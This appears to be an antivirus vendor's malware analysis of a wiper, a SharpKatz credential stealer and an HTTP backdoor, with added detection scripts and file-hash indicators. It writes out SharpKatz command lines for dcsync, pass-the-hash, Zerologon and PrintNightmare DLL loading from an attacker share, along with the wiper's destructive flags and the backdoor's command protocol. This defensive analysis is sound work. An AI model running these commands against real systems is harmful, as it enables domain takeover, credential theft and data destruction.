HackTool.Win32.APT- PS

1 Technical details

1.1 Modules and malware operation sequences

This malware is made up of several modules, both executables and scripts, each of which performs a small, specific task.

Figure 1 – Malware modules

The following is a list of the malware's files with a brief description of what each one does.

File name | Description
wint.bat | Run by the scheduled task; installs and starts the service that runs msdskint.exe
msdskint.exe | Wiper: destroys data on the hard disk, changes users' passwords, deletes Windows backups (shadow copies), clears event logs, etc.
Sharpk.exe | Credential-theft tool (a build of SharpKatz) used to retrieve users' authentication material
uhsvc.exe | HTTP service used to communicate with the C&C server; the attacker also used it to copy the Sharpk.exe tool onto hosts
Last file (lastfile2) | Text file left next to the last corrupted file, containing that file's path

Table 1 – Summary of malware layout performance

1.1.1 Description of the sharpk.exe file operation

Sharpk.exe is a build of SharpKatz, a tool published on GitHub that reimplements the sekurlsa and lsadump modules of mimikatz in C#. It is used to extract credentials and other useful information from Windows hosts.

The tool contains several modules designed for different attack functions. The credential providers it most commonly reads from LSASS are:

MSV, Kerberos, TSPKG, Windows Credential Manager (credman), WDigest

The main modules the tool can run are as follows:

  • Lsadump

This module dumps password hashes, for example the NTLM hash of a specified user (see the dumpsam and dcsync commands below).

  • Pth

Given a user's NTLM hash (or RC4 key), this module starts a new process whose logon session carries that hash, so that network authentication as that user succeeds without the cleartext password (pass-the-hash). Because it injects credential material into LSASS, it needs the same elevated privileges as the other modules; it does not work from an ordinary user account.

  • LogonPasswords

Lists the credentials (user names, domains, NTLM hashes and, where a provider still holds them, cleartext passwords) of users who have recently logged on.

  • Zerologon (for taking over Active Directory)

Zerologon, CVE-2020-1472, was disclosed in August 2020 (patched by Microsoft that month, with public technical details following in September 2020). It stems from Microsoft's flawed use of AES-CFB8 with a fixed all-zero IV in the Netlogon Remote Protocol, which lets an unauthenticated attacker on the network authenticate as a domain controller's machine account and reset its password, and so take over Windows servers, in particular Active Directory domain controllers.

  • DCSync

The dcsync module in SharpKatz lets an attacker impersonate a domain controller and request password hashes from a real domain controller over the directory replication protocol, without executing any code on the target.

The following table lists the arguments accepted by sharpk.exe (SharpKatz) along with their functions.

Input argument | Function
--Command ekeys | List the Kerberos encryption keys held in LSASS (Kerberos is a network authentication protocol)
--Command msv | Retrieve user credentials from the MSV provider (interactive, batch and service logons)
--Command kerberos | Retrieve user credentials from the Kerberos provider
--Command tspkg | Retrieve user credentials from TSPKG
--Command credman | Retrieve user credentials from the Credential Manager
--Command wdigest | Retrieve user credentials from WDigest
--Command logonpasswords | Retrieve the credentials of all logged-on users (logonpasswords)
--Command listshadows | List the system's volume shadow copies (backups)
--Command dumpsam --System syspath --Sam sampath | Dump the local account hashes from offline SYSTEM and SAM hive files
--Command pth --User username --Domain userdomain --NtlmHash ntlmhash | Create a process under the given user and domain using the NTLM hash of the user's password (pass-the-hash)
--Command pth --User username --Domain userdomain --Rc4 rc4key | Create a process under the given user and domain using an RC4 (Kerberos) key
--Command pth --Luid luid --NtlmHash ntlmhash | Replace the NTLM hash of an existing logon session
--Command dcsync --User user --Domain userdomain --DomainController dc | Dump a user's credentials by user name
--Command dcsync --Guid guid --Domain userdomain --DomainController dc | Dump a user's credentials by object GUID
--Command dcsync --Domain userdomain --DomainController dc | Dump the whole domain into a file in the current user's temp folder
--Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword | Dump a user's credentials by user name, authenticating with alternative credentials
--Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword | Dump a user's credentials by GUID, authenticating with alternative credentials
--Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword | Dump the whole domain into a file in the current user's temp folder, authenticating with alternative credentials
--Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ | Check whether the target is vulnerable to Zerologon
--Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ | Exploit the Zerologon vulnerability against the target
--Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPtp0 | Exploit Zerologon, then dump the named user's credentials
--Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCPb22.l | Exploit Zerologon, then dump a user's credentials by GUID
--Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab | Exploit Zerologon, then dump the whole domain into a file in the current user's temp folder
--Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll | Exploit the PrintNightmare vulnerability to load a DLL from an attacker-controlled share on the target
--Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom | Exploit PrintNightmare using the supplied credentials

Table 2 – Description of Sharpkatz tool commands

1.1.2 Description of the .NETWSM task operation

This scheduled task, named .NETWSM, is responsible for executing the wint.bat file:

c:\programdata\pcmr\wint.bat

1.1.3 Description of the wint.bat file operation

This batch file installs the malicious wiper service: a service registered under a name imitating Windows Task Scheduler, except that the misspelling "Taks" is used in place of "Tasks". The wiper file, msdskint.exe, was found on various systems in the following paths:

On the HGH-HGH-KHSRAVI system:

c:\windows\ccmcache\6\msdskint.exe

On other systems:

c:\programdata\pcmr\msdskint.exe

1.1.4 Description of msdskint.exe file operation

This file is a wiper written by the attacker that accepts arguments on the command line. If no argument is supplied, it falls back to a predefined set of arguments that it uses during execution.

The attacker protected this file with Eziriz .NET Reactor to hide the malware code from analysts and antivirus engines. The following describes the malware's operation after unpacking.

The following table lists the arguments accepted by msdskint.exe along with their functions.

Input argument | Function
-wipe-exclude | Paths following this argument are added to the exclusion list and are not wiped.
-light-wipe | Number of times the wipe buffer is written into each file on the victim system (caps the strided-write loop of the light-wipe procedure described below).
-sessions | Logs off and resets all active user sessions.
-delete-users | Deletes the accounts of logged-on users from the system.
-shadows | Deletes all volume shadow copies (system backups).
-start-iis | Starts the IIS service.
-config | No operation defined.
-processes | Terminates the processes named after this argument.
-logs | Clears all Event Viewer logs using the Windows wevtutil.exe tool (enumerating the logs, then clearing them).
-delete | Files that have been wiped are afterwards deleted from the system (via Win32Native.DeleteFile).
-break-users | Changes the passwords of the victim system's users.
-wipe-only | Wipes only the files under the paths given.
-purge | Full purge: the file contents are destroyed by a different, complete procedure rather than the normal one.
-passwords | No operation defined.
-wipe-all | Destroys the data on all system drives.
-stop-iis | Stops the IIS service.

Table 3 – Description of Wiper malware commands

The following is a more detailed description of the arguments that need further explanation.

  • -break-users argument

If this argument is given (together with the users it applies to), the malware sets a new password on each of the targeted accounts defined on the system. The password is the fixed string "S7Y1a82R!".

Figure 2 – The malware changes the users’ password

  • -purge argument

This argument controls how files are wiped. In general, the malware destroys file contents with a 200-byte buffer whose contents are generated by a random algorithm.

If -purge is given, a flag named full_purge is set in the malware code; it stands for a complete wipe. In that mode the malware writes the buffer into the file in consecutive 200-byte blocks from the beginning until it reaches the end of the file, so nothing of the original content survives.

The malware also carries a list named purgeExtensions containing the attacker's candidate extensions. If a file to be destroyed has one of these extensions, it is wiped with the full_purge procedure regardless of the argument.

Figure 3 – Candidate extensions

In addition to the list above, there are other strings in the malware file that can be regarded as candidate extensions. These extensions are:

.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt

  • -wipe-all argument

If this argument is given, all active drives of the system are collected into a list and every file on them is wiped.

During the wipe, three file names are excluded:

  • default.htm
  • index.htm
  • death_to_raisi.exe

When full_purge is not set and the file's extension is not in the candidate list, the destruction procedure is as follows. The malware first writes the 200-byte buffer at offset 0 of the file. It then divides the total file size by 1024 and stores the result in a variable num4.

If a number was given for -light-wipe, num4 is set to the minimum of that number and the computed value.

It then advances 4 × 1024 bytes (4 × 0x400) from the current offset, writes the same 200-byte buffer at that position, and repeats this until it reaches the end of the file or the num4 limit. A "light" wipe therefore overwrites only a small, evenly spaced fraction of a large file's bytes, although that is usually enough to break the file's format. Finally, it creates a file named lastfile2 in the folder of the corrupted file and writes the path of that file into it.
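To make the difference between the two procedures concrete, the following Python model is an added example written for this page; it is not the malware's code. It reproduces the light-wipe and full_purge procedures exactly as described above on an in-memory stand-in for a file and reports which byte ranges are destroyed. The purge-extension set is a small subset of the list above, and the reading that the 4 × 0x400 stride is counted from the position left after the previous write is our assumption.

```python
"""Added example, not the malware's own code: an in-memory model of the two
msdskint.exe wipe procedures described above, used to measure how much of a
file each one actually destroys. Anything marked ASSUMPTION is our reading of
the description, not a fact recovered from the sample."""
import os
from typing import List, Optional, Tuple

BUFFER_SIZE = 200           # size of the wipe buffer described in the report
STRIDE = 4 * 0x400          # gap skipped between light-wipe writes ("1024 bytes, 4 times")
BLOCK = 1024                # divisor used to derive num4 from the file size
# Subset of the candidate extensions listed in the report; any of these forces full_purge.
PURGE_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".sqlite", ".bak", ".dll", ".accdb"}


def wipe_ranges(size: int, full_purge: bool, light_wipe: Optional[int]) -> List[Tuple[int, int]]:
    """Return the (offset, length) ranges the wiper overwrites in a file of `size` bytes."""
    if size <= 0:
        return []
    if full_purge:
        # full_purge: consecutive 200-byte blocks from offset 0 to the end of the file.
        return [(pos, min(BUFFER_SIZE, size - pos)) for pos in range(0, size, BUFFER_SIZE)]
    # Light mode: one write at offset 0, then up to num4 strided writes.
    ranges = [(0, min(BUFFER_SIZE, size))]
    num4 = size // BLOCK
    if light_wipe is not None:
        num4 = min(light_wipe, num4)
    # ASSUMPTION: the stride is counted from the file position left after the
    # previous write, as a sequential seek/write loop would do.
    pos = ranges[0][1]
    for _ in range(num4):
        pos += STRIDE
        if pos >= size:
            break
        length = min(BUFFER_SIZE, size - pos)
        ranges.append((pos, length))
        pos += length
    return ranges


def simulate_wipe(path: str, size: int, purge_flag: bool = False,
                  light_wipe: Optional[int] = None) -> dict:
    """Wipe an in-memory stand-in for `path` and report what was destroyed."""
    ext = os.path.splitext(path)[1].lower()
    full_purge = purge_flag or ext in PURGE_EXTENSIONS
    data = bytearray(size)                  # constructed content: all 0x00 bytes
    junk = bytes([0xFF]) * BUFFER_SIZE      # fixed pattern stands in for the random buffer so the count is exact
    ranges = wipe_ranges(size, full_purge, light_wipe)
    for off, length in ranges:
        data[off:off + length] = junk[:length]
    destroyed = data.count(0xFF)
    return {
        "mode": "full_purge" if full_purge else "light",
        "offsets": [off for off, _ in ranges],
        "destroyed_bytes": destroyed,
        "destroyed_fraction": destroyed / size if size else 0.0,
    }


if __name__ == "__main__":
    # -light-wipe 3 on a 10 KiB text file versus the same size with a purge extension
    print(simulate_wipe("report.txt", 10240, light_wipe=3))
    print(simulate_wipe("report.docx", 10240, light_wipe=3))
```

With the default -light-wipe 3, a 10 KiB text file is hit at offsets 0, 4296 and 8592, i.e. 600 of 10240 bytes; the same file with a .docx extension is overwritten completely. For forensic triage this is the practical difference: light-wiped files of non-candidate types may still yield most of their content, while candidate-extension files are unrecoverable from the file itself.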

As mentioned earlier, msdskint.exe also has predefined arguments that it uses when it receives none. When run as a service with no arguments, the following defaults apply:

Figure 4 – List of strings as input arguments

Based on these arguments, the service behaves as follows:

  1. -light-wipe is 3, i.e. the wipe buffer is written to each file 3 times.
  2. The IIS service is stopped.
  3. All Windows Event Viewer logs are cleared.
  4. All volume shadow copies (backups) are deleted.
  5. -processes is SQL*, i.e. every process whose name matches SQL* is terminated.
  6. All data on all active drives, except the excluded paths, is wiped.
  7. The paths excluded by the attacker are:
     "C:\Windows"
     "C:\$Recycle.Bin"
     "C:\$WinREAgent"
     "C:\Config.Msi"
     "C:\MSOCache"
     "C:\Recovery"
     "C:\Program Files\IBM\*"
     "C:\System Volume Information"
     "C:\Program Files\dotnet"
     "C:\Program Files (x86)\dotnet*"
     "C:\Program Files\Symantec*"
     "C:\Program Files (x86)\Symantec*"
     "C:\Program Files (x86)\Padvish*"
     "C:\Program Files\Kaspersky*"
     "C:\Program Files (x86)\Kaspersky*"
     "C:\Program Files\Microsoft*"
     "C:\Program Files (x86)\Microsoft*"
     "C:\Program Files\Windows*"
     "C:\Program Files (x86)\Windows*"

There is a function in the program that shows the attacker was wary of the installed antivirus. As Figure 5 shows, the malware enumerates the processes running on the system; if the Padvish antivirus service or its UI process is among them, the malware switches to an alternative wipe method instead of its default wipe routine.

This change of tactic appears to be an attempt to evade Padvish's behavioural detection, which recognises the wipe method and stops it immediately; in any case, the second method is also detected and stopped by Padvish.

In the second method, the malware creates a temporary batch file (tmp.bat) for each of the targeted files and registers two timed (scheduled) tasks that run these batch files with SYSTEM privileges.

Figure 5 – Antivirus service and UI search by malware

Figure 6 – Change the data destruction method by malware after finding the Padvish antivirus service

Figure 7 shows an example of one of the generated batch files:

Figure 7 – An example of a bat file created to destroy information

As the contents of this batch file show, the malware first uses the Windows fsutil tool to create a zero-filled file, with a .qipe extension, of the same size as the file it intends to destroy (here 3072 bytes). It then replaces the original file with this dummy file.

Knowing that Padvish prevents the destruction of data, the attacker tried another way of destroying it using only standard system tools. However, the Padvish anti-ransomware component blocked this type of attack as well.

There are also commands in the program code indicating that the malware can record its activity and execution time in a log, as follows:

The malware code contains strings such as "- Excluded", "- Skipped", "BreakSelectedUsers", "DeleteSelectedUsers", "KillProcesses" and others. At the end of the run the log closes with the string "Finished on" followed by the time. The attacker evidently had no need to keep this log from the wiper, because the body of the Output function, which is responsible for printing the result of the operation, is not implemented.
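The behaviours described in this section (zero-filled .qipe files created with fsutil, event logs cleared with wevtutil, tmp.bat run from a timed task as SYSTEM, the c:\programdata\pcmr staging path and the wiper's own flags) are easy to express as command-line detections. The Python rule set below is an added example written for this page, not part of the report; the process-creation records it scans are constructed for the example, and since the report does not say which tool registers the timed tasks, the schtasks.exe rule is an assumption.

```python
"""Added example, not part of the report: a small rule set for the wiper
behaviours described in this section, run over constructed process-creation
records in the style of Sysmon event 1. The report does not name the tool used
to register the timed tasks; ASSUMPTION: schtasks.exe, so that rule is a
heuristic. All sample records below are made up for this example."""
import re
from typing import Dict, List, Tuple

# (rule name, pattern over the command line, rationale from the report)
RULES = [
    ("wiper.fsutil_zero_fill",
     re.compile(r"\bfsutil(\.exe)?\s+file\s+createnew\s+\S+\.qipe\b", re.I),
     "second method: fsutil creates a zero-filled .qipe file of the victim file's size"),
    ("wiper.eventlog_clear",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I),
     "-logs: Event Viewer logs cleared with wevtutil.exe"),
    ("wiper.tmp_bat_task_as_system",
     re.compile(r"\bschtasks(\.exe)?\b(?=.*\btmp\.bat\b)(?=.*/ru\s+\"?(?:nt authority\\)?system\b)", re.I),
     "ASSUMPTION: timed task running tmp.bat with SYSTEM rights (tool not named in the report)"),
    ("wiper.pcmr_staging_path",
     re.compile(r"\\programdata\\pcmr\\(wint\.bat|msdskint\.exe|uhsvc\.exe)", re.I),
     "known staging directory c:\\programdata\\pcmr"),
    ("wiper.msdskint_flags",
     re.compile(r"\bmsdskint\.exe\b.*\s-(wipe-all|wipe-only|purge|break-users|delete-users|shadows|light-wipe|logs)\b", re.I),
     "msdskint.exe invoked with one of its destructive arguments"),
]

# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": r"cmd.exe /c fsutil file createnew C:\inetpub\wwwroot\data.mdb.qipe 3072"},
    {"pid": 4131, "cmdline": r'schtasks /create /tn upd1 /tr "C:\Users\Public\tmp.bat" /sc once /st 12:00 /ru SYSTEM'},
    {"pid": 4140, "cmdline": r"wevtutil.exe cl Security"},
    {"pid": 4150, "cmdline": r"fsutil fsinfo drives"},   # benign admin use, must not match
    {"pid": 4160, "cmdline": r"C:\ProgramData\pcmr\msdskint.exe -wipe-all -light-wipe 3"},
]


def scan(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, rule name) for every rule that matches an event's command line."""
    hits = []
    for ev in events:
        for name, pattern, _why in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append((ev["pid"], name))
    return hits


if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(pid, rule)
```

The fsutil rule is deliberately narrow (createnew with a .qipe target) so that legitimate fsutil administration does not fire; the .qipe extension and the pcmr path are the sample-specific anchors, while the wevtutil and scheduled-task rules are generic enough to catch variants.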

1.1.5 Description of uhsvc.exe file operation

This file acts as an HTTP service for the attacker. Its configuration and the attacker's commands are stored in two files, uhsvc.exe.start and uhsvc.exe.ini.

The service, registered on the system under the name Microsoft Update Health Host, has commands for downloading and uploading files, for connecting to a SQL database and sending the results to the malicious server, and for manipulating local files. Several versions of this HTTP service have been found, including 0.1.3vXH and 0.1.4vXH; they do not differ in overall behaviour and accept the same commands.

Like the wiper, this file was protected with Eziriz .NET Reactor. After unpacking, the following was observed:

1. After starting as a service, the malware creates a TcpListener on the victim system. The version shown below uses port 9399. In the recovered uhsvc.exe.start file the attacker also added a firewall rule allowing inbound packets to port 9399 from outside the network.

Figure 8 – Content of the uhsvc.exe.start file

2. The malware can receive various commands from the attacker's server and execute them through cmd.exe.

Figure 9 – Execution of hacker commands by Shell

3. It uses SqlConnection and SqlCommand to run arbitrary queries against a SQL database.

4. It can create files.

Figure 10 – File creation by a hacker through malware

5. The malware can zip and unzip directory contents, download/upload files and, if required, delete the attacker's files. It uses the Ionic.Zip (DotNetZip) library for compression.

Figure 11 – Ability to compress/open and delete files

Figure 12 – Ability to manipulate the directories contents

6. It can be given the address of a proxy through which to reach the server, via the commands "p=" and "b=".

Figure 13 – Proxy commands

Figure 14 – Proxy setting

7. It can report the malware version to the attacker (the attacker used several versions of the HTTP service during the operation).

Figure 15 – Display of malware version

8. It can report the current path of the malware file (here "c:\programdata\pcmr\uhsvc.exe").

9. It can create a log file and send it to the attacker to show any errors.

Figure 16 – Creating a log file

Figure 17 – Log file

The following table lists the operations supported by the malware:

Operation | Command
Shellexecute with zip support | a_1=s
Run SQL commands | a_1=c
View output and error logs, then delete them | a_1=i1
Delete output and error logs | a_1=i2
Run cmd interactively | a_1=i
Shellexecute | Cmd=
Show malware path | W_i
Show malware version | V_i
Act as a proxy and forward the connection to another website / infected node | p= or b=
Write an arbitrary file | M= with afe=1
Run SQL commands | Con
File manager (browse directories, download/upload files, ...) | PRT
Read/write based on GET | other

Table 4 – Malware web service commands
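Because the backdoor dispatches purely on query-string parameters, requests to the listener port can be triaged directly from connection or proxy logs. The Python script below is an added example written for this page, not the backdoor's code: it maps each request on port 9399 to the Table 4 operation it would trigger. The log lines are constructed, the log format is ours, and the assumptions that parameter names are matched case-insensitively and that "Con" and "PRT" are parameter names are ours as well.

```python
"""Added example, not the backdoor's code: classify requests that reach the
uhsvc.exe listener port according to the command parameters in Table 4, over
constructed connection-log lines made up for this example. Only the parameter
names in the table are used; ASSUMPTIONS: parameter names are matched
case-insensitively, "Con" and "PRT" are parameter names, and the log format
below is ours."""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

LISTENER_PORT = 9399   # port used by the analysed sample (from the report)

# Constructed log lines: "<time> <src> -> <dst>:<port> <method> <url>"
SAMPLE_LOG = """\
2022-01-10T08:12:01Z 203.0.113.5 -> 10.0.0.12:9399 GET /?a_1=i
2022-01-10T08:12:07Z 203.0.113.5 -> 10.0.0.12:9399 GET /?V_i=1
2022-01-10T08:12:09Z 203.0.113.5 -> 10.0.0.12:9399 POST /?M=c%3A%5Cprogramdata%5Cpcmr%5Csharpk.exe&afe=1
2022-01-10T08:12:15Z 203.0.113.5 -> 10.0.0.12:9399 GET /?p=http%3A%2F%2F10.0.0.20%3A9399%2F
2022-01-10T08:12:21Z 203.0.113.5 -> 10.0.0.12:9399 GET /?PRT=1
2022-01-10T08:13:00Z 198.51.100.7 -> 10.0.0.12:443 GET /owa/?a_1=s
"""

LOG_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (GET|POST) (\S+)$")


def classify(url: str) -> str:
    """Map a request URL to the uhsvc.exe operation it would trigger (Table 4)."""
    raw = parse_qs(urlsplit(url).query, keep_blank_values=True)
    q = {k.lower(): v[0] for k, v in raw.items()}   # ASSUMPTION: case-insensitive names
    a1 = q.get("a_1")
    if a1 == "s":
        return "shellexecute with zip support"
    if a1 == "c" or "con" in q:
        return "run SQL commands"
    if a1 == "i1":
        return "view and delete output/error logs"
    if a1 == "i2":
        return "delete output/error logs"
    if a1 == "i":
        return "run cmd interactively"
    if "cmd" in q:
        return "shellexecute"
    if "w_i" in q:
        return "show malware path"
    if "v_i" in q:
        return "show malware version"
    if "p" in q or "b" in q:
        return "proxy / forward connection"
    if "m" in q and q.get("afe") == "1":
        return "write file"
    if "prt" in q:
        return "file manager"
    return "read/write based on GET (other)"


def triage(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request to the listener port, tagged with its operation."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or int(m.group(4)) != LISTENER_PORT:
            continue          # not the backdoor's port, or not a request line
        ts, src, dst, _port, method, url = m.groups()
        hits.append({"time": ts, "src": src, "dst": dst, "method": method,
                     "command": classify(url)})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h["time"], h["src"], h["method"], h["command"])
```

The port filter is what keeps the request on 443 out of the result; the same a_1=s parameter on an unrelated web application is not evidence of the backdoor, whereas the sequence on port 9399 (interactive shell, version check, file write of sharpk.exe into the pcmr directory, proxy setup, file manager) reads as the operator's session described in this section.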

2 How to deal with the malware

All known samples of this malware are detected by Padvish as HackTool.Win32.HTTPbackdoor, HackTool.Win32.SharpKatz and Trojan.Win32.QWipe.

In addition, Padvish's data-protection feature, which detects the wipe behaviour of this malware, prevents it from destroying data and terminates its execution.

3 Indicators of Compromise (IOC)

File name | MD5
uhsvc.exe | 466832ef3f81f1cc37466be9e1b7c4d2
uhsvc.exe | 9fbab064ec583f80dc15e1abc2ebcad3
uhsvc.exe | 2529ed634df912d95d52be717560b0b6
uhsvc.exe | cc97e34cf19f56263abd0f89e907cf7a
uhsvc.exe | 66e6d3b03613074f38b2a6acff8e8229
uhsvc.exe | 94354ecf588835cea2352b873211290e
uhsvc.exe | af029e3168e27394020b3f4315b2419b
uhsvc.exe | 2c1e86a5c5c5ad19d64baa66e78af6f1
uhsvc.exe | e633f5ce289cdcbdee93b7c02178fa35
uhsvc.exe | 4cc3665c4fb23ace6b0f9b396c66f8e6
uhsvc.exe.start | 381d8239561c3714c1b71f0c2df4f57e
msdskint.exe | 13e7caebf00dd2315885e1f47030eb3c
wint.bat | 0aa3b91d584803a39250742b69173841
Sharpk.exe | 3ea25f166bef1bf79c374f16f2e4e29f

 
